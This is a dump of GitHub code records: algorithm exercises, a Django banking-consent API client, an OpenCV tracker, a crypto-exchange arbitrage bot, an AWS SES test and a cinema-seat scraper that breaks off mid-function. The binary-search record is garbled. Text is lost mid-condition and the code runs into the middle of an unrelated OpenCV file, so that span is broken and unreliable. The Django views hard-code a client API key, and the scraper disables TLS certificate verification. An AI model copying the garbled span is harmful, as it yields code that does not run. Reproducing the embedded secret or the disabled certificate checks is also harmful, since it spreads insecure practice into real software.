+{"seq_id":"21129810900","text":"arr = [1, 2, 3]\n\nN = 3#len arr\n\n#사용한 결과물을 담는 데이터\nsel = [0] * N#결과들이 저장될 리스트\ncheck = [0] * N#해당 원소를 이미 사용했는지 안 했는지에 대한 체크\n\ndef comb(idx):\n if idx == N:\n print(sel)\n return\n for i in range(idx, N):\n if not check[i]:\n check[i] = True\n sel[i] = arr[i]\n comb(i+1)\ncomb(0)\n","repo_name":"Gyujeong-Lee/Algorithm_study","sub_path":"0419/comb.py","file_name":"comb.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33924653329","text":"import json\nfrom django.shortcuts import render\nfrom requests.api import request\nfrom rest_framework import serializers\nfrom rest_framework.response import Response\nimport codecs\nimport requests\nimport jwt\nimport uuid\nfrom datetime import datetime\nimport time\nfrom django.views import View\nfrom rest_framework.serializers import Serializer\nfrom rest_framework.views import APIView\nimport requests\nimport logging\nimport base64\nfrom http.client import HTTPConnection # py3\nfrom .serializer import UserSerializer, TransactionSerializer, GoalSerializer\nfrom .models import User, Transaction, Goal\nfrom rest_framework.generics import CreateAPIView, ListAPIView, ListCreateAPIView, UpdateAPIView, DestroyAPIView, RetrieveUpdateAPIView\n\n\nclass createConsent(APIView):\n\n def post(self, request):\n mobileNumber = request.data.get(\"mobile\")\n body = createData(mobileNumber)\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, body)\n url = \"https://aa-sandbox.setu.co/Consent\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.post(url, headers=headers, json=body)\n response = response.json()\n resUrl = \"https://anumati.setu.co/\" + response[\"ConsentHandle\"] + \\\n \"?redirect_url=http://484c-103-250-137-194.ngrok.io/redirect/\"\n return Response(resUrl)\n\n\nclass consentNotification(APIView):\n def post(self, request):\n consentId = request.data.get(\n \"ConsentStatusNotification\").get(\"consentId\")\n consentStatus = request.data.get(\n \"ConsentStatusNotification\").get(\"consentStatus\")\n if consentStatus == \"ACTIVE\":\n fetchSignedConsent(consentId)\n dateNow = datetime\n res = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"response\": \"OK\",\n }\n return Response(res)\n\n\ndef createData(mobileNumber):\n dateNow = datetime\n expiry = time.time()\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"ConsentDetail\": {\n \"consentStart\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"consentExpiry\": \"2021-12-03T14:25:33.440Z\",\n \"consentMode\": \"VIEW\",\n \"fetchType\": \"ONETIME\",\n \"consentTypes\": [\"TRANSACTIONS\", \"PROFILE\", \"SUMMARY\"],\n \"fiTypes\": [\"DEPOSIT\", \"MUTUAL_FUNDS\"],\n \"DataConsumer\": {\"id\": \"1fbad2f2-ce8c-4127-b24b-df360f57b06c\"},\n \"Customer\": {\"id\": mobileNumber + \"@setu-aa\"},\n \"Purpose\": {\n \"code\": \"101\",\n \"refUri\": \"https://api.rebit.org.in/aa/purpose/101.xml\",\n \"text\": \"Wealth management service\",\n \"Category\": {\"type\": \"string\"},\n },\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n \"DataLife\": {\"unit\": \"MONTH\", \"value\": 0},\n \"Frequency\": {\"unit\": \"MONTH\", \"value\": 100},\n \"DataFilter\": [\n {\n \"type\": \"TRANSACTIONAMOUNT\",\n \"operator\": \">=\",\n \"value\": \"0\",\n },\n ],\n },\n }\n return data\n\n\ndef makeDetachedJWS(privateKey, body):\n\n encoded = jwt.encode(body, privateKey, algorithm=\"RS256\")\n encoded = encoded.split(\".\")\n encoded[1] = \"\"\n return \".\".join(encoded)\n\n\ndef fetchSignedConsent(consentId):\n privateKey = codecs.open(\n 
\"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"Consent\": consentId})\n url = \"https://aa-sandbox.setu.co/Consent/\" + consentId\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, headers=headers)\n response = response.json()\n fiDataRequest(response[\"signedConsent\"], consentId)\n\n\ndef fiDataRequest(signedConsent, consentId):\n keys = generateKeyMaterial()\n requestBody = requestDataBody(\n signedConsent, consentId, keys[\"KeyMaterial\"])\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, requestBody)\n url = \"https://aa-sandbox.setu.co/FI/request\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n data = requestBody\n response = requests.post(url, headers=headers, json=data)\n response = response.json()\n fiDataFetch(response[\"sessionId\"],\n keys[\"privateKey\"], keys[\"KeyMaterial\"])\n\n\ndef generateKeyMaterial():\n url = \"https://rahasya.setu.co/ecc/v1/generateKey\"\n response = requests.get(url)\n response = response.json()\n return response\n\n\ndef requestDataBody(signedConsent, consent_id, keys):\n dateNow = datetime\n data = {\n \"ver\": \"1.0\",\n \"timestamp\": dateNow.now().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\"),\n \"txnid\": str(uuid.uuid4()),\n \"FIDataRange\": {\n \"from\": \"2021-1-06T11:39:57.153Z\",\n \"to\": \"2021-06-30T14:25:33.440Z\",\n },\n\n \"Consent\": {\n \"id\": consent_id,\n \"digitalSignature\": signedConsent.split(\".\")[2],\n },\n \"KeyMaterial\": keys,\n }\n return data\n\n\ndef fiDataFetch(session_id, encryption_privateKey, keyMaterial):\n privateKey = codecs.open(\n \"/home/radhika/hfi/prthvi/server/api/keys/private_key.pem\", encoding=\"utf-8\").read()\n detachedJWS = makeDetachedJWS(privateKey, {\"a\": \"b\"})\n url = \"https://aa-sandbox.setu.co/FI/fetch/\" + session_id\n headers = {\n \"Content-Type\": \"application/json\",\n \"client_api_key\": \"bac41217-a584-4f79-bd79-5285adb61037\",\n \"x-jws-signature\": detachedJWS,\n }\n response = requests.get(url, headers=headers)\n response = response.json()\n decryptData(response[\"FI\"], encryption_privateKey, keyMaterial)\n\n\ndef decryptData(fi, privateKey, keyMaterial):\n fi_data = fi[0]\n body = {\n \"base64Data\": fi_data[\"data\"][0][\"encryptedFI\"],\n \"base64RemoteNonce\": fi_data[\"KeyMaterial\"][\"Nonce\"],\n \"base64YourNonce\": keyMaterial[\"Nonce\"],\n \"ourPrivateKey\": privateKey,\n \"remoteKeyMaterial\": fi_data[\"KeyMaterial\"],\n }\n url = \"https://rahasya.setu.co/ecc/v1/decrypt\"\n data = body\n response = requests.post(url, json=data)\n response = response.json()\n base64Data = response[\"base64Data\"]\n b64_str = base64Data.encode('ascii')\n b64_bytes = base64.b64decode(b64_str)\n data = b64_bytes.decode('ascii')\n data = json.loads(data)\n\n print(\"LALALALlalalallALLA\")\n print(data)\n\n if User.objects.filter(accountNumber = data[\"account\"][\"maskedAccNumber\"]).exists():\n ###Update User###\n user = User.objects.get(accountNumber = data[\"account\"][\"maskedAccNumber\"])\n user.userName = data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"]\n user.balance = data[\"account\"][\"summary\"][\"currentBalance\"]\n 
user.save()\n    else:\n        ###Create User###\n        accountData = {\n            \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n            \"userName\": data[\"account\"][\"profile\"][\"holders\"][\"holder\"][\"name\"],\n            \"balance\": data[\"account\"][\"summary\"][\"currentBalance\"]\n        }\n        serializer = UserSerializer(data=accountData)\n        if serializer.is_valid():\n            serializer.save()\n    \n    for i in data[\"account\"][\"transactions\"][\"transaction\"]:\n    \n        # match on txnId so each transaction updates its own row instead of\n        # collapsing every transaction into one record per account\n        if Transaction.objects.filter(txnId = i[\"txnId\"]).exists():\n            ###Update Transaction###\n            txn = Transaction.objects.get(txnId = i[\"txnId\"])\n            txn.accountNumber = data[\"account\"][\"maskedAccNumber\"]\n            txn.mode = i[\"mode\"]\n            txn.type = i[\"type\"]\n            txn.amount = i[\"amount\"]\n            txn.narration = i[\"narration\"]\n            txn.valueDate = i[\"valueDate\"]\n            txn.balance = i[\"currentBalance\"]\n            txn.save()\n        else:\n            ###Create Transaction###\n            transactionData = {\n                \"accountNumber\": data[\"account\"][\"maskedAccNumber\"],\n                \"mode\": i[\"mode\"],\n                \"type\": i[\"type\"],\n                \"txnId\": i[\"txnId\"],\n                \"amount\": i[\"amount\"],\n                \"narration\": i[\"narration\"],\n                \"valueDate\": i[\"valueDate\"],\n                \"balance\": i[\"currentBalance\"]\n            }\n            serializer = TransactionSerializer(data=transactionData)\n            if serializer.is_valid():\n                serializer.save()\n\nclass viewTxn(APIView):\n    def get(self, request):\n        queryset = Transaction.objects.all().values()\n        array = []\n        for i in queryset:\n            if i[\"valueDate\"].split(\"-\")[1] == \"06\" and i[\"type\"] == \"DEBIT\":\n                array.append(i)\n        return Response(array)\n\n\nclass get1per(APIView):\n\n    def get(self, request):\n        txn = Transaction.objects.filter(\n            valueDate=\"2021-06-08\").values(\"amount\")[0][\"amount\"]\n        txn = txn/100\n        return Response(txn)\n\n\nclass getGoal(ListAPIView):\n    queryset = Goal.objects.all()\n    serializer_class = GoalSerializer\n\nclass editGoal(APIView):\n    def put(self,request):\n        CauseType = request.data.get('causeType')\n        DonationItem = request.data.get('donationItem')\n        ItemQuantity = request.data.get('itemQuantity')\n        ItemPrice = request.data.get('itemPrice')\n        if Goal.objects.filter(donationItem = DonationItem).exists():\n            ###Update Goal###\n            goal = Goal.objects.get(donationItem = DonationItem)\n            goal.causeType = CauseType\n            goal.itemQuantity = ItemQuantity\n            goal.itemPrice = ItemPrice\n            goal.save()\n        else:\n            ###Create Goal###\n            goalData = {\n                \"causeType\": CauseType,\n                \"donationItem\": DonationItem,\n                \"itemQuantity\": ItemQuantity,\n                \"itemPrice\": ItemPrice,\n            }\n            serializer = GoalSerializer(data=goalData)\n            if serializer.is_valid():\n                serializer.save()\n        return Response()\n\nclass viewUserData(ListAPIView):\n    queryset = User.objects.all()\n    serializer_class = UserSerializer","repo_name":"RadhikaSheth/Prthvi","sub_path":"server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"32579607594","text":"#\n# @lc app=leetcode.cn id=790 lang=python3\n#\n# [790] 多米诺和托米诺平铺\n#\n\n# @lc code=start\nclass Solution:\n def numTilings(self, n: int) -> int:\n MOD = 10 ** 9 + 7\n dp = [[0] * 4 for _ in range(n + 1)]\n dp[0][3] = 1\n for i in range(1, n + 1):\n dp[i][0] = dp[i - 1][3]\n dp[i][1] = (dp[i - 1][0] + dp[i - 1][2]) % MOD\n dp[i][2] = (dp[i - 1][0] + dp[i - 1][1]) % MOD\n dp[i][3] = (((dp[i - 1][0] + dp[i - 1][1]) % MOD + dp[i - 1][2]) % MOD + dp[i - 1][3]) % MOD\n return dp[n][3]\n# @lc code=end\n\n","repo_name":"Phil2ng/LeetCode","sub_path":"790.多米诺和托米诺平铺.py","file_name":"790.多米诺和托米诺平铺.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24011971044","text":"class Solution(object):\n def searchInsert(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n \n if len(nums)==0:\n return 0\n else:\n start = 0\n end = len(nums)-1\n mid = (start+end)/2\n # print(start,mid,end)\n while (end-start)>2:\n print(nums[start],nums[mid],nums[end])\n if nums[mid]=target:\n return start\n elif nums[end]list:\n\n xmin,xmax,ymin,ymax,mat=self.mini_img(img)\n img=img[ymin:ymax,xmin:xmax]\n img1=img.copy()\n img1=cv.cvtColor(img,cv.COLOR_BGR2HSV)\n img1[mat!=255]=[0,0,0]\n # B,G,R=cv.split(img1)\n # #hhh=img.copy()\n # R[R!=0]=0\n # G[G!=0]=0\n # hhh=cv.merge([B,G,R])\n if see_make:\n cv.imshow('rrr',mat)\n cv.imshow('ooo',img)\n cv.imshow('ppp',img1)\n #cv.imshow('yyy',hhh)\n #cv.imshow('uuu',mmm)\n cv.waitKey(0) \n cv.destroyAllWindows()\n\n hist1 = cv.calcHist([img1],[0], None, [15], [1.0,255.0])\n #hist2 = cv.calcHist([img1],[1], None, [3], [1.0,255.0])\n hist3 = cv.calcHist([img1],[2], None, [5], [1.0,255.0])\n #print(hist6)\n\n hist1=hist1/np.sum(hist1)\n #hist2=hist2/np.sum(hist2)\n hist3=hist3/np.sum(hist3)\n hist=np.concatenate((hist1,hist3),axis=0)\n return hist,mat,(xmin,xmax,ymin,ymax)\n\ndef init_get_video(classname,video_name,num_of_photo,path,update_data=False):\n flag=0\n try:\n os.mkdir(os.path.join(path,video_name))\n except Exception as Error:\n print(Error)\n flag=1\n for i in classname:\n try:\n length=len(os.listdir(os.path.join(path,video_name,i)))\n except Exception as Error:\n flag=0\n break\n if length.2f}\".format(sum(fps)/len(fps)))\n return acc\n\n KKK=KNNClassifier(video_name,modelpath)\n test_path=os.path.join(modelpath,video_name+'_test')#\"./knn_classes/train_it2/\"\n acc=test(test_path,KKK)\n print(acc)\n\n","repo_name":"chenzhike110/Fast-tracking","sub_path":"ORBmin.py","file_name":"ORBmin.py","file_ext":"py","file_size_in_byte":10605,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"28655868508","text":"# -*- coding: utf-8 -*-\nimport telegram\nimport time\nimport sys\nimport config\nfrom exchage_api.bittrex import bittrex\nfrom exchage_api.poloniex import poloniex\nimport util\n\n# 변수선언\nmarketcurrency = config.markgetcurrency # 기준코인\n#altcurrency = config.altcurrency # 알트코인\naltcurrency = 'DGB' # 알트코인\nspread = 0.8 # 차이 0.8%\nbittrex_market = '{0}-{1}'.format(marketcurrency, altcurrency)\npoloniex_market = '{0}_{1}'.format(marketcurrency, altcurrency)\nis_marketcurrency_transfering = False\nis_altcurrency_transfering = False\nbittrex_api = config.bittrex_api\nbittrex_key = config.bittrex_key\npoloniex_api = config.poloniex_api\npoloniex_key = config.poloniex_key\nbittrex_marketcurrency_bal = 0\npoloniex_marketcurrency_bal = 0\nbittrex_altcurrency_bal = 0\npoloniex_altcurrency_bal = 0\nbittrex_marketcurrency_address = '1DAFcmkeQiMWdhAmwKBLmx9pUpM4yak4DC'\npoloniex_marketcurrency_address = '1J4LrydHhH356J1ykvbXVDsj4a2s2497PP'\nbittrex_altcurrency_address = 'DPCgJ15dvMSTVvSKUX1LU1s4RZs5Dk2T8H'\npoloniex_altcurrency_address = 'DBCLd1NZpKFjc8eo2RgyWL43a6zBkCqTLP'\ntelegram_token = config.telegram_token\ntelegram_chat_id = config.telegram_chat_id\nspread = 0.8 # %\nspread = spread / 100\nbot = telegram.Bot(token=telegram_token)\n# API 객채생성\nbitt = bittrex(bittrex_api, bittrex_key)\npolo = poloniex(poloniex_api, poloniex_key)\n\n\ndef send_message(msg=None):\n print(msg)\n #bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\ndef send_message_with_error(message=None):\n msg = f\"⚠️ Error - wait 10 min\\n{0}\".format(message)\n print(msg)\n bot.sendMessage(chat_id=telegram_chat_id, text=msg)\n\n\n# 잔고조정\ndef balancing():\n global bittrex_marketcurrency_bal\n global poloniex_marketcurrency_bal\n global bittrex_altcurrency_bal\n global poloniex_altcurrency_bal\n global is_marketcurrency_transfering\n global is_altcurrency_transfering\n\n # 이체 중 인지 판단\n # 송금하면 송금플래그를 true 로변경\n # 송금전의 잔액 기억하고 있다가 송금한 금액만큼(수수료 감안) 증가하면 이체완료로 간주한다\n\n is_marketcurrency_transfering = False\n if not is_marketcurrency_transfering:\n # Market Currency 잔고 조회\n try:\n bittrex_marketcurrency_bal = float(bitt.getbalance(marketcurrency)['Available'])\n except:\n print('bittrex get balance error-{0}'.format(bitt.getbalance(marketcurrency)['Available']))\n bittrex_marketcurrency_bal = 0\n try:\n poloniex_marketcurrency_bal = float(polo.returnBalances()[marketcurrency])\n except:\n print('poloniex get balance error-{0}'.format(polo.returnBalances()[marketcurrency]))\n poloniex_marketcurrency_bal = 0\n total_marketcurrency_bal = bittrex_marketcurrency_bal + poloniex_marketcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3}'.format(bittrex_marketcurrency_bal, marketcurrency, poloniex_marketcurrency_bal, marketcurrency))\n\n # Market Currency 잔고 조정\n if bittrex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #bitt.withdraw(marketcurrency, transfer_amount, poloniex_marketcurrency_address)\n send_message('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n if poloniex_marketcurrency_bal / total_marketcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_marketcurrency_bal - (total_marketcurrency_bal / 2)\n #polo.withdraw(marketcurrency, transfer_amount, bittrex_marketcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, marketcurrency))\n except:\n send_message_with_error('error')\n\n 
# Alt Currency 잔고 확인\n is_altcurrency_transfering = False\n if not is_altcurrency_transfering:\n try:\n bittrex_altcurrency_bal = float(bitt.getbalance(altcurrency)['Available'])\n except:\n bittrex_altcurrency_bal = 0\n try:\n poloniex_altcurrency_bal = float(polo.returnBalances()[altcurrency])\n except:\n poloniex_altcurrency_bal = 0\n total_altcurrency_bal = bittrex_altcurrency_bal + poloniex_altcurrency_bal\n print('bittrex : {0:8f}{1} / poloniex : {2:8f}{3} '.format(bittrex_altcurrency_bal, altcurrency, poloniex_altcurrency_bal, altcurrency))\n\n # Alt Currency 잔고 조정\n if bittrex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = bittrex_altcurrency_bal - (total_altcurrency_bal / 2)\n #bitt.withdraw(altcurrency, transfer_amount, poloniex_altcurrency_address)\n send_message('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Poloniex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n if poloniex_altcurrency_bal / total_altcurrency_bal > 0.8:\n try:\n transfer_amount = poloniex_altcurrency_bal - (total_altcurrency_bal / 2)\n #polo.withdraw(altcurrency, transfer_amount, bittrex_altcurrency_address)\n send_message('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n except:\n send_message_with_error('withdraw to Bittrex : {0:8f}{1}'.format(transfer_amount, altcurrency))\n\n\n# 오더북 조회\ndef getorderbook():\n # Bittrexx 오더북 조회\n #decimal.getcontext().prec = 8\n bittrex_orderbook = bitt.getorderbook(bittrex_market, 'both', 1)\n bittrex_buyorder = bittrex_orderbook['buy']\n bittrex_sellorder = bittrex_orderbook['sell']\n #print(bittrex_orderbook)\n poloniex_orderbook = polo.returnOrderBook(poloniex_market)\n poloniex_buyorder = poloniex_orderbook['bids']\n poloniex_sellorder = poloniex_orderbook['asks']\n #print(poloniex_orderbook)\n '''\n for order in bittrex_buyorder:\n print(float(order['Rate'])*1000) #내림차순\n print(\"------------------------------------------\")\n for order in poloniex_buyorder: #내림차순\n print(order[0])\n \n for order in bittrex_sellorder:\n\n print(round(decimal.Decimal(bittrex_sellorder[0]['Rate']), 8)) #오름차순\n #round(decimal.Decimal(order['Rate']), 8)\n #print(\"------------------------------------------\")\n for order in poloniex_sellorder: #오름차순\n print(decimal.Decimal(order[0]))\n \n print(util.toSatoshi(bittrex_sellorder[0]['Rate']), bittrex_sellorder[0]['Quantity'])\n print(util.toSatoshi(poloniex_buyorder[0][0]), poloniex_buyorder[0][1])\n print(util.toSatoshi(bittrex_sellorder[0]['Rate'] - float(poloniex_buyorder[0][0])))\n '''\n bittrex_current_sell = util.toSatoshi(bittrex_sellorder[0]['Rate'])\n bittrex_current_buy = util.toSatoshi(bittrex_buyorder[0]['Rate'])\n poloniex_current_sell = util.toSatoshi(poloniex_sellorder[0][0])\n poloniex_current_buy = util.toSatoshi(poloniex_buyorder[0][0])\n print('Bittrex buy:', bittrex_current_buy, marketcurrency, 'sell:', bittrex_current_sell, marketcurrency)\n print('Poloniex buy:', poloniex_current_buy, marketcurrency, 'sell:', poloniex_current_sell, marketcurrency)\n print('bitt:polo', 1 - bittrex_current_sell/poloniex_current_buy)\n print('polo:bitt', 1 - bittrex_current_sell / poloniex_current_buy)\n if poloniex_current_buy > bittrex_current_sell and 1 - bittrex_current_sell/poloniex_current_buy > spread:\n #print((1 - (bittrex_current_sell/poloniex_current_buy))*100, \"%\")\n print(u'💰 Difference : ', round((1 - (bittrex_current_sell / poloniex_current_buy)) * 100, 2), \"%\", ' / Buy at Bittrex!!')\n\n if 
bittrex_current_buy > poloniex_current_sell and 1 - poloniex_current_sell/bittrex_current_buy > spread:\n print(u'💰 Difference : ', round((1 - (poloniex_current_sell / bittrex_current_buy))*100, 2), \"%\", ' / Buy at Poloniex')\n\n##오더\n\n'''\nprint(polo.returnTicker())\n# Getting the BTC price for DGB\ncurrencysummary = bitt.getmarketsummary(market_bitt)\ncurrencyprice = currencysummary[0]['Last']\n#print ('The price for {0} is {1:.8f} {2}.'.format(currency, currencyprice, trade))\n\n# 전체 잔고조회\nbalances = bitt.getbalances()\nfor coin in balances:\n if coin['Balance'] == 0:\n continue\n print('{0} : {1:.8f}'.format(coin['Currency'], coin['Balance']))\n\n#dogebalance = bittApi.getbalance(currency)\n'''\n\nif __name__ == '__main__':\n #balancing()\n while True:\n try:\n getorderbook()\n time.sleep(10)\n except:\n print(\"⚠️ Bot paused during 1 min -\", sys.exc_info())\n time.sleep(60*1)\n print(\"🔆 Bot resumed\")\n","repo_name":"hobbit19/Arbitrage_BOT","sub_path":"trader.py","file_name":"trader.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
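A tiny worked example of the spread rule used in getorderbook above, with hypothetical prices (the 0.8% threshold comes from the script's own configuration):

    # Hypothetical numbers: buy at 100 on one exchange, sell at 101 on the other.
    # The relative gap is 1 - 100/101, about 0.99%, which clears the 0.8%
    # threshold, so the bot would flag this pair as an opportunity.
    buy_price, sell_price, threshold = 100.0, 101.0, 0.008
    gap = 1 - buy_price / sell_price
    print(gap, gap > threshold)  # 0.00990..., True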
+{"seq_id":"69922697691","text":"from unittest import mock\n\nimport botocore.session\nfrom botocore.stub import Stubber\nfrom django.conf import settings\n\nimport project.apps.api.tasks\nfrom project.apps.api.tasks import send_email\n\n\ndef test_send_email(monkeypatch):\n email = \"user@example.com\"\n\n monkeypatch.setattr(settings, \"AWS_SES_EMAIL_SOURCE\", email)\n monkeypatch.setattr(settings, \"AWS_SES_REGION\", \"default\")\n\n ses_client = botocore.session.get_session().create_client(\n \"ses\", region_name=settings.AWS_SES_REGION\n )\n stubber = Stubber(ses_client)\n\n def client_mock(a, **kwargs):\n return ses_client\n\n boto3_mock = mock.Mock()\n boto3_mock.client = client_mock\n monkeypatch.setattr(project.apps.api.tasks, \"boto3\", boto3_mock)\n\n expected_response = {\"MessageId\": \"12345\"}\n\n subject = \"Welcoming\"\n body = \"Hi There!\"\n\n expected_args = {\n \"Source\": email,\n \"Destination\": {\"ToAddresses\": (email,)},\n \"Message\": {\n \"Subject\": {\"Data\": subject},\n \"Body\": {\"Text\": {\"Data\": body}},\n },\n }\n\n stubber.add_response(\"send_email\", expected_response, expected_args)\n stubber.activate()\n\n send_email((email,), subject=subject, body=body)\n","repo_name":"libdx/treasury","sub_path":"project/tests/integration/test_api/test_send_email.py","file_name":"test_send_email.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74349044890","text":"import time\nimport requests\nimport json\nimport logging\nimport re\nimport urllib.parse\nfrom datetime import datetime\nfrom random import randint\nfrom typing import List, Optional\nimport aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nfrom requests_html import AsyncHTMLSession\nfrom datetime import date\n\nfrom cinemas.models import Cinema, ScraperTask, ShowtimeSeats\nfrom cinemas.models import Movie as DjangoMovie\nfrom common.models import Country\n\nsession = AsyncHTMLSession()\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"./novocinemas.log\"),\n logging.StreamHandler()\n ]\n)\nMAIN_PAGE = \"https://reelcinemas.com/en-ae/\"\nTCPCONNECTOR_LIMIT = 50\nSESSION_TIMEOUT_SEC = 5200\n\nSLEEP_BEFORE_REQUESTS_SEC = 1\n# get movies for this day\nDAY = date.today().strftime('%Y-%m-%d')\n'''{\n movie : \n {mall_name : \n {\n exp : [1,2,3] - sold/empty\n }\n }\n}'''\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\"\n}\n\n\nasync def post_request(session: aiohttp.ClientSession, url: str,\n params: dict = None,\n data: dict = None,\n json: dict = None) -> Optional[str]:\n for i in range(3):\n try:\n async with session.post(url, params=params, data=data, json=json, timeout=120) as resp:\n logging.debug(f\"Loading data from {url}, params - {params}, data - {data}, json - {json}\")\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. Trying again\")\n await asyncio.sleep(randint(5, 60))\n except asyncio.TimeoutError:\n logging.error(f\"Timeout Error. Url - {url}. Trying again\")\n continue\n except Exception as e:\n await asyncio.sleep(randint(5, 60))\n logging.error(f\"Error - {e}. Url - {url}. Trying again\")\n continue\n return None\n\n\nasync def get_html(session: aiohttp.ClientSession, url: str, params: dict = None):\n if params is None:\n params = {}\n\n while True:\n async with session.get(url, params=params) as resp:\n logging.debug(f\"Loading page {url}, params - {params}\")\n try:\n if resp.ok:\n return await resp.text()\n else:\n logging.error(f\"Page failed to load. Url - {resp.url}. Status code - {resp.status}. 
Trying again\")\n await asyncio.sleep(randint(5,30))\n except Exception as e:\n print(\"Insdie get_html execption..\")\n\n\ndef get_asp_net_cookie():\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.get(url, headers=HEADERS, verify=False)\n asp_net_cookie = response.cookies['ASP.NET_SessionId']\n return asp_net_cookie\n\n\ndef extract_url_parts(onclick): ##get the movie id and title\n pattern = r'MovieDetailsPage\\(\"(.*?)\",\"(.*?)\"\\)'\n match = re.search(pattern, onclick)\n if match:\n return match.group(1), match.group(2)\n return None, None\n\n\nasync def get_movies(session: aiohttp.ClientSession): ##get movie name and url\n url = \"https://reelcinemas.com/en-ae/\"\n time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = await get_html(session, url)\n # if response.status_code == 200:\n # Save the response content to a file\n # with open('/Users/n.purushottam.lagad/Downloads/reel.txt','wb') as file:\n # file.write(response.content)\n # print(f\"Downloaded the response content\")\n soup = BeautifulSoup(response, 'html.parser')\n movie_items = soup.find_all('div', {'class': 'movie-item'})\n movies = []\n for movie_item in movie_items:\n try:\n movie_title = movie_item['id']\n language = soup.find('div', class_='duration-language').find_all('span')[-1].get_text(strip=True)\n movie_id, title_dashed = extract_url_parts(\n str(movie_item)) ## movie_id = group(1) and title_dashed = group(2)\n movie_url = f\"https://reelcinemas.com/en-ae/movie-details/{movie_id}/{title_dashed}\" ##movie_id = HO00003413 & title_dashed = Fast-X-\n movies.append((movie_title, movie_url, movie_id, language))\n except:\n pass\n print(f\"movies_len : {len(movies)}\")\n return movies\n\n\ndef get_movie_session(asp_net_cookie, magic_string):\n url = \"https://reelcinemas.com/WebApi/api/UserAPI/CreateMovieCookie\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\",\n \"Content-Type\": \"application/json\",\n \"ASP.NET_SessionId\": asp_net_cookie\n }\n # time.sleep(SLEEP_BEFORE_REQUESTS_SEC)\n response = requests.post(url=url, headers=headers, data='\"' + magic_string + '\"', verify=False)\n movie_session = response.cookies['movieSession']\n return movie_session\n\n\ndef extract_num_empty(input_str):\n pattern = r'status:empty'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_num_sold(input_str):\n pattern = r'status:sold'\n matches = re.findall(pattern, input_str)\n return len(matches)\n\n\ndef extract_experience(input_str):\n return input_str['Experience']\n # exp = input_str['cinemaConfig']\n # experience = exp['ComboSeatSelection']['Experiences'][0]\n # return experience\n\n\nasync def get_seating_info(session: aiohttp.ClientSession):\n url = \"https://reelcinemas.com/WebApi/api/SeatLayourAPI/GetSeatLayout\"\n # cookies = {\n # \"ASP.NET_SessionId\": asp_net_cookie,\n # \"movieSession\": 